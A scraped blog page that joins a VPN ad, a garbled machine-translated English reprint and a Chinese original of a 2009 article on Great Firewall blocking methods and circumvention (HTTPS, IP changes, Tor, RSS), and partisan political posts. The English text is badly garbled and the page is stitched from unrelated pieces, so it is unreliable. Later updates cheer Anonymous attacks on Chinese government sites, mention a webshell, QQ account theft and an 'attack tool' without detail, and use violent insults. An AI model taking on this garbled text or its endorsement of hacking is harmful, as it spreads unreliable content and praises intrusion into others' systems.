Includes all necessary features. No up-selling, hidden fees or other surprises.
Starts at just $ 2.49 / month. Sign up now!

Friendly terms

Money back guarantee

We offer a 14-day full money back guarantee. Try our service for 2 whole weeks before making your final decision.

Connect all your devices

Our plans include support for multiple devices. Connect additional computers, smartphones and tablets for free.

Cancel any time

Cancel before or after you receive our renewal invoice. Renewal is always optional.

Full featured

Features such as a NAT firewall, unlimited server switches and uncapped connections are standard on most of our plans.

Auto-Proxy

Prefer an old-School Proxy? Check out our Auto-Proxy . Also included free, with our 12 or Unlimited Basic Plan.

SmartDNS

Unlock content without a fully encrypted Connection? Our SmartDNS service is included free with your 12 or Unlimited Basic Plan.

Smart Routing

Smart routing unlocks restricted websites regardless of which server you use. This keeps local content fast while allowing you to enjoy content from other regions.

High-speed

Do not hold back! Go as fast as the Internet lets you go. With our Unlimited Plan WE allow Connections of up to 1000Mbps. Need to go even Faster? Contact US for a custom quote.

 =====
 http://www.zhoushuguang.com


 ===


March 15, 2009, Sunday


Internet blocking technology solutions and Anti-blockade technology program

Author: Zola published in the March 15, 2009, Sunday, (1:54 am)
Original Source: https://www.zuola.com/weblog/?p=1353
Disclaimer: This article may be freely reprinted in the case indicate the original source and author information and this statement

table of Contents

  1. What is GFW
  2. Technical program networks blocked
    • Content Advisor
    • Shielding IP
    • DNS hijacking
  3. Anti-blockade technology program
    • Use SSL encryption key confrontation review
    • To the site to avoid change IP IP shield
    • Tor to avoid interference with DNS
    • Using an online RSS reader to

What is GFW

GFW is the Great Fire Wall acronym is Golden Shield Project. The project consists of several components, to achieve different functions. Great Firewall of China mainly refers to the government to monitor and filter Internet content of software and hardware systems, the servers and routers and other equipment, plus associated application of the composition.
First, you need to emphasize that, due to widespread Internet censorship China, Chinese domestic contain "inappropriate" content sites will be subject to direct government administrative intervention, were asked to self-censorship, self-regulation, and even closed, the main role is so GFW analyze and filter information networks inside and outside China to visit each other.
GFW Web content filtering and analysis are bidirectional, GFW not only for the domestic audience visited sites outside interference in China, but also interfere with foreign readers to access the host site in China, the paper discusses the contents of GFW shield on foreign network communication method and appropriate countermeasures.

Technical program networks blocked

GFW blockade on the network technology program are:
  1. Content Advisor
  2. Shielding IP
  3. DNS hijacking
GFW how to shield the content disseminated on the Internet? Specific way blocked on your network:



  1. Content Advisor

    Content GFW review the default port for the HTTP transport protocol port 80, the contents of HTTP transmission is content plaintext, not encrypted, GFW is an IDS [Intrusion detection system (Intrusion Detection System)], GFW has a sensitive word list, If access to the host outside of the Chinese mainland HTTP data stream found sensitive words, in between two hosts forged a "reset" signal, leading to both the host thought the other suspended request. Such as access to use the Firefox browser
    http://newsvote.bbc.co.uk/chinese/
    http://knol.google.com/k/-/-/3jhi1zdzvxj3f/2 will appear the following screen:
  2. Shielding IP

    IP is shielded by GFW router (router) to control, plus a forged routing rules on access to overseas last a gateway leading to all IP packets blocked access to certain sites can not be reached. Normal mode of operation of the router is to learn other routers broadcast routing rules, encountered in line with known IP packet forwarding rules, the rules have been sent press encounter unknown rule IP data, then forwarded to the primary gateway. GFW router by Blacklist (blacklist) to forward specific IP packets, you can shield IP specific sites, this IP blacklist is not fixed, it will be updated. Such as access http://www.dw-world.de/chinese/ following screen appears
  3. DNS hijacking

    DNS hijacking is for the most serious interfere with some websites. There are two ways of interference:
    1. A DNS server is provided by the network service provider (Internet Service Provider / ISP) for DNS spoofing, when people visit a website, you need to put the domain name into an IP address, DNS server is responsible for translating domain names into IP addresses , ISP Chinese mainland after receiving instruction Communications Authority of blocked sites in the DNS server where the domain name to join specific false A record , when using this DNS server network user to access this particular site, DNS service will be given fake IP address, resulting in failure to access the site, and even return to ISP operators to provide error pages and advertising pages.
    2. Another is GFW on DNS queries use UDP 53 ports are filtered according to the blacklist, met 53-port gateway to query DNS requests using UDP abroad, it returns a false IP address
    Examples:
    In mainland visit http://www.zuola.com/ it may be a "server response time is too long."
    My family is currently used by China Telecom to provide network access:
    Internet connection Connection type: PPPoE
    IP Address: 220.168.9.112
    Gateway address: 220.168.8.1
    DNS Server: 222.246.129.80, 59.51.78.210
    When I use the DNS server provided by China Telecom query, the following picture:

    I even use the query in Chinese mainland, will be GFW interference overseas OPENNDS or other DNS servers and obtain a false IP address,
    After the adoption of remote login in the United States hosts DNS queries, DNS queries at this time is completely non-interference GFW obtained www.zuola.com real IP address is 75.119.214.237
GFW in OSI architecture model two levels of review and blockade, one in the transport layer (Transport Layer) interference, one is at the network layer (Network Layer) interference:
  1. In the transport layer (Transport Layer) interference:
    1. DNS hijacking GFW transport layer complete interference on UDP 53 ports;
    2. GFW censorship on the default port of TCP 80 port content filtering, on http transfer protocol, and the contents on the tcp 80 port transmission censoring encountered keywords, GFW inserted "reset" signal in the session, causing the page It is reset.
  2. Shielding IP is GFW blockade and interference in the network layer (Network Layer) on the completion of interference on IP routing protocols.

GFW review the position in the OSI model review:

Anti-blockade technology program

GFW specific site program has the following three ways:
  1. GFW for the domain name to shield sensitive word
  2. GFW shield where the IP domain
  3. GFW interference domain DNS resolution
Accordingly against GFW, master site are the following methods:
  1. Site uses SSL encryption key confrontation review;
  2. To the site to avoid change IP IP shield;
  3. Recommended mainland site visitors use DNS resolution servers abroad, or recommended mainland visitors use DNS tor to avoid interference
  4. Readers recommend using an online RSS reader to read the latest articles
GFW some specific methods appropriate confrontation
  1. Use SSL encryption key confrontation review

    HTTPS is based on the HTTP protocol SSl is secure hypertext transfer protocol. When a user accesses a Web site using HTTPS, the client's browser need to obtain safety certificates for the website and the security certificate from the publisher's digital signature authentication, security certificate for the server's public key, the server with the private key encryption to web content Transport, Client browser to public key to decrypt web content can be obtained. Propagation network content, the content is encrypted and can not be automatically reviewed GFW content delivery, also can not be inserted GFW "reset" signal.
    1. Example 1: in November 2007 to July 2008, https://www.zuola.com had successfully avoided review GFW with HTTPS, so that Internet users in China can access this site directly.
    2. Example 2: When people can not access http://knol.google.com/k/-/-/3jhi1zdzvxj3f/2 when, instead https://knol.google.com/k/-/-/3jhi1zdzvxj3f/2 on access
  2. To the site to avoid change IP IP shield

    Use SSL encryption contents against GFW review, GFW HTTPS how to deal with it?
    GFW staff encountered using HTTPS site, they know can not use the machine to automatically filter their mind "sensitive content" and "harmful content", so direct shield IP sites, this time, access to this Web server Any data packets are not directly over the GFW destination. At this time only you need to change the domain A record for a masked IP can avoid IP. At this point the game is like Tom and Jerry, GFW had followed constantly shielded IP, and IP work GFW shield is performed manually. Not be executed automatically by machines. If GFW shield IP operation can be performed automatically, that is masked IP domain owner can borrow capacity GFW shield any offshore site.
    1. Example 3: in November 2007 to July 2008, https://www.zuola.com had used SSL encryption + change IP successfully avoided review GFW, so that Internet users in mainland China can continue to be able to access this website directly.
    2. Examples 4: https://doubleaf.com means also uses SSL encryption and change IP lets users direct access to mainland China
  3. Recommended mainland site visitors use DNS resolution servers abroad, or recommended mainland visitors use DNS tor to avoid interference

    During the 2008 Olympics, I found GFW for www.zuola.com using DNS hijacking the way once and for shielding the way, leading to domestic users can not get the correct IP my site directly, even with "unbounded" "Freedom Gate" "VPN "and other tools to break through the blockade, will be the wrong door. I can only recommend the readers' use TOR + FoxyProxy plug breakthrough GFW "a, TOR is a distributed, anonymous network, FoxyProxy is an agent server management software that allows Firefox to use TOR to receive DNS requests:



    TOR works :
    Tor helps to reduce the risk of simple and sophisticated traffic analysis, Tor put your traffic across multiple locations on the Internet, so no single point can link you to your destination linked. It's like using a roundabout, it is difficult to identify the path to get rid of tracking you, and then periodically erasing your footprints. On the Tor network, the source and destination are not directly connected by a path, but by a number of units covered by the original path of the random path relay packets transmitted on this path, and therefore, there is no single point of the observer can know the data came from, where to go.


    When you create a private network pathway with Tor, the user's software or client establishes a connection consisting of encrypted loop (circuit) through relays on the network incrementally. Loop once extended hop (hop), the relay on the loop knows only which relay gave it data and which data is sent to a relay. No individual relay ever knows the complete path of the packet. Clients on each hop loop and negotiates a separate set of keys, so you can ensure that the data can not be any hop track.
    Once the loop is established, many kinds of data can be exchanged in the above, different types of applications can be deployed over the Tor network. Because each relay sees loop jump, an eavesdropper nor a compromised relay can not pass traffic analysis the connection's source and destination linked. Tor only works for TCP data stream, any support SOCKS applications can use it.
    For efficiency, Tor is about ten minutes in the same connection request initiated by the same circuit. Later requests are given a new circuit, to keep people from linking your earlier actions and new behaviors linked.
  4. Readers recommend using an online RSS reader to read the latest articles

    Really Simple Syndication (RSS) is a strict XML format specification information transmission, standard XML format allows the information in the document after a publication read by different programs, easy to distribute and aggregate (Sysndicat). RSS is a XML application of this information to build a technology platform for rapid dissemination of the latest content of the site via RSS Feed spread through online RSS reader automatically push articles to readers, a people without direct access to the site will be able to see the latest content, RSS allows content to be easily distributed, only you need to know the numerous online RSS reader RSS address on the network can always read the contents of the RSS Feed. RSS is easily generated and distributed, it is a technique GFW not block or require a lot of resources to be able to blockade.
    Examples:
    1. Example 3: My website since April 2007 Chongqing Holdout reported after shielding, but my FEED address http://feed.zuola.com/ number of subscriptions has been growing, Google Reader Subscribe to the number of users from about 700 to 2686. But GFW still interfere with Google reader, use https way https://www.google.com/reader/view/ to see the following data
    2. Example 4: " Invisible Tibet "is a Tibetan people's BLOG, although no direct access to the domestic audience, but readers in China are still able to subscribe to her RSS FEED to see her in the eyes of Tibet, this is available in google reader Feed subscription http://woeser.middle-way.net/feeds/posts/default
Other site backup in this document:
  1. http://space.zuola.com/D2AC7D299F493A68_241.html
  2. https://docs.google.com/View?docid=dggh5mp6_0zzmm4fdn
  3. http://zhoushuguang.blogspot.com/2009/03/blog-post.html
  4. https://knol.google.com/k/-/-/3jhi1zdzvxj3f/14
Reference documents:
" Tor Overview ": http://tor.zuo.la/overview.html.zh-cn
" I taught you how to use TOR + FoxyProxy breakthrough GFW " https://knol.google.com/k/-/-/3jhi1zdzvxj3f/2
" Some friends of GFW correct understanding ": https://www.zuola.com/weblog/?p=1228
" Zola teach you to play: How to fight GFW domain name hijacking ": https://www.zuola.com/weblog/?p=1151

 ===
 

2009年3月15日星期日


網絡封鎖技術方案與反網絡封鎖技術方案

作者:左拉發表於2009年年三月15日,星期天,(1:54上午)
原始出處:https://www.zuola.com/weblog/?p=1353
版權聲明:可在標明原始出處和作者信息及此聲明的情況下自由轉載本文

目錄

  1. GFW是什麼
  2. 網絡封鎖的技術方案
    • 內容審查
    • 屏蔽IP
    • DNS劫持
  3. 反網絡封鎖的技術方案
    • 使用SSL加密對抗關鍵字審查
    • 給網站換IP避開IP屏蔽
    • 用器來避開DNS干擾
    • 使用在線RSS閱讀器來

GFW是什麼

GFW是大火災 Wall的缩写,是金盾工程。这个工程由若干个部分组成,实现不同功能。防火长城主要指中国政府监控和过滤互联网内容的软硬件系统,由服务器和路由器等设备,加上相关的应用程序所构成。
首先,需要强调的是,由于中国网络审查广泛,中国国内含有“不合适”内容的的网站,会受到政府直接的行政干预,被要求自我审查、自我监管,乃至关闭,故GFW的主要作用在于分析和过滤中国境内外网络的资讯互相访问。
GFW对网络内容的过滤和分析是双向的,GFW不仅针对国内读者访问中国境外的网站进行干扰,也干扰国外读者访问主机在中国大陆的网站,本文讨论GFW屏蔽国外网络上传播的内容的方法及相应的对策。

網絡封鎖的技術方案

GFW在網絡上封鎖的技術方案有:
  1. 內容審查
  2. 屏蔽IP
  3. DNS劫持
?GFW如何屏蔽網絡上傳播的內容網絡上封鎖的具體方式:

  1. 內容審查

    GFW的内容审查针对HTTP传输协议的默认端口的80端口,HTTP传播的内容是明文的内容,没有经过加密,GFW是一个IDS[Intrusion 檢測系統 (入侵检测系统)],GFW有一个敏感字名单,若在中国大陆访问境外的主机的HTTP的数据流里发现敏感字眼,就在两台主机间伪造一个"reset”信號,導致雙方主機以為對方中止了請求。如用火狐瀏覽器訪問
    http://newsvote.bbc.co.uk/chinese/
    http://knol.google.com/k/-/-/3jhi1zdzvxj3f/2就會出現以下畫面:
  2. 屏蔽IP

    屏 蔽IP是GFW通过路由器(router)来控制的,在通往国外的最后一个网关上加上一条伪造的路由规则,导致通往某些被屏蔽的网站的所有IP数据包无法 到达。路由器的正常工作方式是学习别的路由器广播的路由规则,遇到符合已知的IP转发规则的数据包,则按已经规则发送,遇到未知规则IP的数据,则转发到 上一级网关。GFW的路由器按黑名单(blacklist)来转发特定的IP数据包,则可屏蔽特定的网站的IP,此IP黑名单不是固定的,会更新。如访http://www.dw-world.de/chinese/出現以下畫面
  3. DNS劫持

    DNS劫持是針對某些網站的最嚴重的干擾干擾的方式有兩種:
    1. 一種是通過網絡服務提供商(Internet服務 Provider/ISP)提供的DNS服务器进行DNS欺骗,当人们访问某个网站时,需要要把域名转换为一个IP地址,DNS服务器负责将域名转换为IP地址,中国大陆的ISP接受通信管理局的屏蔽网站的指令后在DNS服务器里加入某些特定域名的虚假A记录 ,当使用此DNS服务器的网络用户访问此特定网站时,DNS服务便给出假的IP地址,导致访问网站失败,甚至返回ISP运营商提供的出错页面和广告页面。
    2. 另一種是GFW在DNS查詢使用的UDP 53端口上根据黑名单进行过滤,遇到通往国外的使用UDP的53端口进行查询的DNS请求,就返回一个虚假的IP地址
    例子:
    大陸在訪問http://www.zuola.com/就可能出現“服務器響應時間過長”。
    我家目前用的中國電信提供的網絡接入:
    互聯網連接連接類型:PPPoE協議
    IP地址:220.168.9.112
    網關地址:220.168.8.1
    DNS服務器:222.246.129.80,59.51.78.210
    當我使用中國電信提供的DNS服務器進行查詢時,出現以下畫面:

    甚至我在中国大陆使用用国外的OPENNDS或其他DNS服务器进行查询,都会被GFW干扰而得到虚假的IP地址,
    通过远程登录在美国的主机进行DNS查询后,此时的DNS查询是完全无GFW干扰的,可得到www.zuola.com的真实IP地址是 75.119.214.237
GFW在OSI模型結構的兩個層面進行審查狀語從句:封鎖,一種在傳輸層(傳輸層)進行干擾,一種是在網絡層(網絡層)進行干擾:
  1. 在傳輸層(傳輸層)進行干擾:
    1. DNS劫持GFW在UDP 53端口上進行傳輸層完成干擾;
    2. 內容審查GFW對默認端口TCP 80端口上進行內容過濾,在HTTP傳輸協議上,對TCP 80端口上传输的内容进行内容审查,遇到关键字,GFW就在会话中插入“reset”信号,导致网页被重置。
  2. 屏蔽IP是GFW在網絡層(網絡層)上的封鎖和干擾,是在IP路由協議上完成干擾。

GFW審查在OSI模型上的審查的位置:

反網絡封鎖的技術方案

GFW針對具體網站的方案有以下三種:
  1. GFW把域名為作敏感字來屏蔽
  2. GFW把域名所在的IP屏蔽
  3. GFW干擾域名DNS解析
相應對抗GFW,網站的主人有下面幾個方法:
  1. 網站使用SSL加密對抗關鍵字審查;
  2. 給網站換IP避開IP屏蔽;
  3. 推荐大陆的网站访问者使用国外的DNS解析服务器,或推荐大陆的访问者使用tor来避开DNS干扰
  4. 推薦讀者使用在線RSS閱讀器來讀取最新文章
相應對抗GFW有的具體方法
  1. 使用SSL加密對抗關鍵字審查

    HTTPS是基于SSl的HTTP协议,是安全超文本传输协议。当用户访问使用HTTPS的网站时,用户端的浏览器需要先获取网站的安全证书和来自认证的 安全证书发行商的数字签名,此安全证书为服务器的公钥,服务器用私钥把网页内容加密进行传输,客户端浏览器以公钥解密即可得到网页内容。网络内容的传播过 程中,内容是加密的,无法被GFW自动审查传输的内容,亦无法被GFW插入"reset"信号。
    1. 实例1:在2007年11月到2008年7月, https://www.zuola.com曾用HTTPS成功避开GFW的审查,让中国大陆的网民能够直接访问此网站。
    2. 实例2:当人们无法访问http://knol.google.com/k/-/-/3jhi1zdzvxj3f/2时,改用https://knol.google.com/k/-/-/3jhi1zdzvxj3f/2就可以访问
  2. 給網站換IP避開IP屏蔽

    使用SSL加密可對抗GFW的內容審查,GFW如何對付HTTPS呢?
    GFW的工作人員遇到使用HTTPS的網站後,他們知道無法使 用机器自动的过滤他们心目中的“敏感内容”和“有害内容”,于是直接屏蔽网站的IP,此时,通往此网站服务器的任何数据包都无法直接越过GFW到达目的 地。此时只需要更改网站域名的A记录,换一个IP就可以避开屏蔽IP。此时就像猫和老鼠的游戏了,GFW只好跟在后面不断屏蔽IP,并且GFW的屏蔽IP 的工作是人工执行的。无法通过机器自动执行。如果GFW能够自动执行屏蔽IP的操作,那被屏蔽IP的域名的拥有者就可以借用GFW的能力屏蔽任何境外网站了。
    1. 實例3:在2007年11月到2008年7月,https://www.zuola.com曾用SSL加密+換IP成功避開GFW的審查,讓中國大陸的網民能繼續能夠直接訪問此網站。
    2. 实例4: https://doubleaf.com也使用SSL加密和换IP的手段让中国大陆的网民能直接访问
  3. 推荐大陆的网站访问者使用国外的DNS解析服务器,或推荐大陆的访问者使用tor来避开DNS干扰

    在2008年奥运期间,我发现GFW针对www.zuola.com使用了DNS劫持的方式一劳永逸的屏蔽方式,导致国内用户无法直接获得我的网站的正确IP,即使使用“无界”“自由门”“VPN”等突破封锁的工具,也会走错门。那就只能推荐读者《 使用TOR+FoxyProxy插件突破GFW 》了,TOR是一个分布式的、匿名的网络, Foxyproxy是一款代理服务器管理软件,可以让Firefox使用TOR来收发DNS请求:



    TOR的工作方式
    托爾有助於降低簡單的和高級的流量分析的風險,Tor的把你的流量分散到互联网上的多个地点,所以不存在单一的一点可以把你和你的目的地联系起来。这就好像用一条拐弯抹角的、难以辨认的路径甩掉跟踪你的人,然後定期擦掉你的腳印。在托爾网络上,来源和目的地不是用一条路径直接连接的,而是由一条通过数台中继的随机路径覆盖原始路径,数据包在这条路径上传输,因此,不存在任何单一一点上的觀察者能夠知道數據從哪裡來,到哪裡去。


    用托爾创 建一条私有网络路径时,用户的软件或客户端通过网络上的中继递增地建立一条由若干加密连接组成的环路(circuit)。环路一次扩展一跳(hop),环 路上的中继仅仅知道它从哪一个中继接收数据以及向哪一个中继发送数据。没有一台单独的中继会知道数据包的完整路径。客户端与环路上的每一跳都协商一组独立的密鑰,這樣可以保證數據通過​​任何一跳時都無法跟踪。
    一旦环路建立完成,多种类型的数据可以在上面进行交换,不同种类的应用程序也可以在托爾网络上部署。因为每一台中继最多只能知道环路中的一跳,窃听者或者被入侵的中继都无法通过流量分析把连接的来源和目的地联系起来。 托爾僅作用於TCP數據流,任何支持SOCKS的應用程序都可以使用它。
    出於有效性,Tor的为大约在相同的十分钟内发起的连接请求分配同一环路。以后的请求被分配不同的环路,这样他人就不能把你早先的行为和新的行为联系起来。
  4. 推薦讀者使用在線RSS閱讀器來讀取最新文章

    真正簡單的整合 (RSS)是一种严格XML的信息传递的格式规范,标准的XML格式文档可允许信息在一次发布后通过不同的程序阅读,易于分发和聚合(Sysndicat)。RSS 是這種XML應用搭建了信息迅速傳播的一個技術平台,網站的最新內容通過RSS Feed传播,能通过在线RSS阅读器自动推送文章到读者的阅读器,人们无需直接访问网站就能看到最新的内容,RSS能够让内容很容易的被分发,只需要知道RSS地址,網絡上無數的在線RSS閱讀器總能讀取到RSS Feed中的内容。RSS是很容易生成并分布的,这是GFW无法拦截或需要大量资源才能够封锁的一种技术。
    實例:
    1. 实例3:我的网站自2007年4月重庆最牛钉子户报道后被屏蔽,但我的FEED地址http://feed.zuola.com/的订阅数却一直在增长, Google 讀者訂閱用戶數量從700左右增加到2686.不過GFW仍然會干擾谷歌閱讀器,使用HTTPS方式的https://www.google.com/reader/view/才能看到以下數據
    2. 实例4:《 看不见的西藏 》是一个藏族人的BLOG,虽然国内读者无法直接访问,但中国大陆的读者仍然能够通过订阅她的RSS 飼料來看到她眼中的西藏,這個頻道是可用谷歌閱讀器的訂閱http://woeser.middle-way.net/feeds/posts/default
此文檔的其他站點備份:
  1. http://space.zuola.com/D2AC7D299F493A68_241.html
  2. https://docs.google.com/View?docid=dggh5mp6_0zzmm4fdn
  3. http://zhoushuguang.blogspot.com/2009/03/blog-post.html
  4. https://knol.google.com/k/-/-/3jhi1zdzvxj3f/14
參考文檔:
托爾概述 ”:http://tor.zuo.la/overview.html.zh-cn
手把手教你使用TOR + FoxyProxy的突破 GFW”https://knol.google.com/k/-/-/3jhi1zdzvxj3f/2
糾正網友一些對GFW的認識”:https://www.zuola.com/weblog/?p=1228
左拉教你玩:如何對抗GFW的域名劫持”:https://www.zuola.com/weblog/?p=1151

 ===
 Popular DynamicSharing an over 360 php horse

My personal experience is so beautiful to steal QQ number2015-08-24

熱門動態


 =====

 Our favorite stroll and browse anonymously around the hacker tribe,
They know better than the real world of humanity who know better 'human touch'.
In reality, people are vain temptations cause loss of conscience!
Confuse black and white, contaminating the sacred orthodox morality!

These full '' humanity '' virtual network,
But it is a lot of disenfranchised, are subjected to violence autocratic dictator,
Resulting in physical injury, badly beaten;
So toward these tribal conscience and hackers Anonymous,
They stretch v brutal and irrational political violence suffered monitoring, intimidation, lynchings behavior !! "

Conscience can distinguish the authenticity!! Truth eternal existence!

In this, thank you for the selfless sharers, for people to make a great share!

Melody.Blog Thanksgiving unlimited ~

===

我們最喜愛遛覽匿名和各地黑客部落,
他們比真實世界的人更懂人性,更懂'人情味'.
在現實中的人們被虛榮誘惑致良心喪失!
混淆黑白,污染了正統道德的神聖!

而這些充滿''人性''的虛擬網絡,
卻是很多被剝奪權利,被獨裁者專制施以暴力對待,
以致身體損傷,頭破血流;
於是走向這些良知匿名和黑客部落,
伸訴他們所受的政治不合理的野蠻和暴力的監控,恐嚇,私刑行為!!"

良知能夠辨別真偽!真理永恆存在!

在此,感謝各位無私分享者,對人們作出偉大的分享!

Melody.Blog感恩 無限~

===

 http://hk.apple.nextmedia.com/news/art/20151105/19360590

 In Taiwan, the KMT election election very adverse circumstances, hold Xi Ma (Taiwan called Ma Xi will), the CPC and the KMT election lift intentions all too clear. Taiwan authorities said Ma Xi will not have an agreement, there will be no joint statement, but the CPC's Taiwan Affairs Office did not mention these two horses in the workshop will be when they talk about the meeting on behalf of, each other's names. Therefore, Taiwan does not sign the agreement and statements, does not mean that the CCP will not unilaterally send a written statement or make some commitments.
 
Xi Jinping visited the usual gift, how could the two sides for the first time in such an important 𥧌 will only comb with two banana? One gift is nothing more than economic benefits, the second is to relax Taiwan's international participation in space, such as to make it clear that Taiwan added an investment bank, and so on. Chinese Communist Party and the Kuomintang to Taiwan recognized the benefits large enough enough, there must be conducive to the lift in the polls far behind the KMT's election. However, the situation is likely to the contrary, the CCP's gift to send get bigger, causing Taiwan's voters will be more wary. As clothing trade agreements, ostensibly to Taiwan more good than harm, but in Taiwan have fueled anti-MAST waves.
In the final the final analysis is the CCP's credit bankrupt, payment of any good news will be most Taiwanese regarded as bearish.
(Column Tuesdays, Thursdays published)
(Https://www.facebook.com/mrleeyee)

Li Yi





 =====
 http://hk.apple.nextmedia.com/news/art/20151105/19360590
  

在台灣大選選情對國民黨極為不利的情況下,舉行習馬會(台灣叫馬習會),中共和國民黨拉抬選情的用心都太清楚了。台灣當局表示馬習會不會有協議,不會有聯 合聲明,但中共國台辦在講習馬會時沒有提到這兩點,只講會面的名義、相互的稱呼。因此,台灣不簽協議和聲明,不等於中共不會單方面發個聲明或作些書面承 諾。

慣常出訪送大禮的習近平,豈會在如此重要的兩岸首次𥧌會中只帶兩梳蕉?大禮無非一是經濟好處,二是放寬台灣的國際參與空間,比如明確表示讓 台灣加入亞投行,等等。中共和國民黨認定給台灣的好處夠大夠多,必有利於拉抬國民黨在大選中遠遠落後的選情。然而,情況很可能相反,中共的禮送得越大,會 更引起台灣選民的戒心。正如服貿協定,表面看來是對台灣利大於弊,但在台灣反而引發反服貿巨浪。
歸根到柢是中共的信用已破產,發放任何利好消息都會被多數台灣人視為利空。
(本欄每周二、四出版)
https://www.facebook.com/mrleeyee

李怡

 =====

 **- Update [08/11-2015] - this artificial disaster, we can not let the devil control no wonder the UN Legion, American Legion !?UAV was shot down for no reason,  do not open these terrorist acts, is only a frenzied beast !! Original URL: [ http://fossbytes.com/how-to-hack-a-military-drone-manual-is-already-online/ ] "how to crack a military UAV manual is online" -Tittle: Nevin Quick-virus tools and actually attached PDF Download !! Who is this thinking is not normal, please look our city /  other countries in the military Minister WARNING !!! -
-更新[08/11-2015]-這種人為的災禍,怎麼能任由魔鬼操控?!難怪 我們聯合國軍團,美國軍團的無人機被無故擊落,不公開你們這些恐怖分子行為,是只有喪心病狂的畜牲!原網址:[ http://fossbytes.com/how-to-hack-a-military-drone-manual-is-already-online/ ]"如何破解一個軍用無人機手冊已聯機"-內文竟附連結病毒工具和PDF下載!!這是誰的思維長得不正常!請我國/各國軍事大臣注意!!

  http://melody-free-shaing.blogspot.com/2015/11/4-11-2015-update-1-in-november-it-is.html
-Update[07/11-2015] Anonymous and hacker tribe - cause us a lot of curiosity...! - Add Hong Kong Apple Daily our favorite famous columnist writer Mr. Li Yi's brilliant comment! look at Hong Kong today,, Taiwan tomorrow, garbage Ma Ying-jeou betrayed us Taiwan people us,! we do not want this dirty Ma Ying-jeou, the most suitable for this crap dead in the mainland!
-更新[07/11-2015]黑客與匿名部落--引起我們很多好奇之...!-加上香港蘋果日報我們最喜愛的著名專欄主筆李怡先生的精采評論!看今日香港,,明日台灣,垃圾馬英九出賣我們台灣人們,我們不要骯臟的馬英九,這垃圾死在內地最適宜!-

 http://melody-free-shaing.blogspot.com/2015/11/4-11-2015-update-1-in-november-it-is.html
[06/11-2015]Update- By Anonymous Action=更新匿名行動 [ #opchina #ophk ]]- The Anonymous Legion said :"#OpHongKong 7 websites the Chinese government is under the control of Anonymous. You should have expected us. "-
"[http://XXXXX.com ]-& By{ news2.mingpao.com }-Well done^^!Melody.Blog Thankgiving for all great" Support Human Right Org."~

 http://melody-free-shaing.blogspot.com/2015/11/4-11-2015-update-1-in-november-it-is.html
- [4 / 11-2015] Update - {1} In November, it is the death of celebrities "accidentally" tear down "the Berlin Wall history hero Schabowski death!" - Reported by the New Tang Dynasty Television - {2} by Anonymous Asia to show the public information - {3} An anonymous knight in the Mainland, he said:"I hate the Communist Party, hate Chinese traditional culture, hate friendships, hate leadership Niubi Hong Hong, hate authoritarianism.Hate Huitie not see posted , hate people do not understand the language of the environment on people who criticize forever hate refuse to listen refused to communicate the " left anger " and " right  anger ", hate only ten minutes to observe the life of people on the judgment of others."--- The chivalrous brothers name is" Zola Zhou "also shared some exclusive high IT skills, more a very useful tool to attack the Communist Party of IP delicate, so we can join the fiber off 'Communist' and called "zoonotic" !! - Last by our favorite Hong Kong Apple Daily forum famous critic of " Mr. Li Yi "as the end of this Title article!-*All The World Lauguage*-
-[4/11-2015]更新-{1}.在11月日是那位名人的逝世呢?"意外「推倒」柏林牆 歷史功臣沙博夫斯基逝世!"由新唐人電視台報導-{2}.由匿名亞洲給我們的資訊!-{3}.一位在內地的匿名俠客,他説:"我讨厌共产党,讨厌中国传统文化,讨厌称兄道弟,讨厌牛逼哄哄的领导,讨厌威权主义,讨厌回贴不看贴,讨厌不了解别人的语言环境就批判个没完的人,讨厌拒绝倾听拒绝沟通的左愤和右愤,讨厌只用十分钟观察就评判别人一生的人。"---這位俠義哥兒名稱是"Zola Zhou "還分享了一些獨家高技巧資訊,更有一款非常好用的攻擊共產黨IP的精巧工具,使我們也可一起加入纖滅'中共'又名為"畜共"!!-最後,是由我們最喜愛的香港蘋果日報論壇著名評論家李怡先生的文章作為本篇的結尾!-

 http://melody-free-shaing.blogspot.com/2015/11/4-11-2015-update-1-in-november-it-is.html
 ===Melody.Blog===THANKSGIVING===>/

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!








沒有留言:

張貼留言

window.___gcfg = {
lang: 'zh-CN',
parsetags: 'onload'
};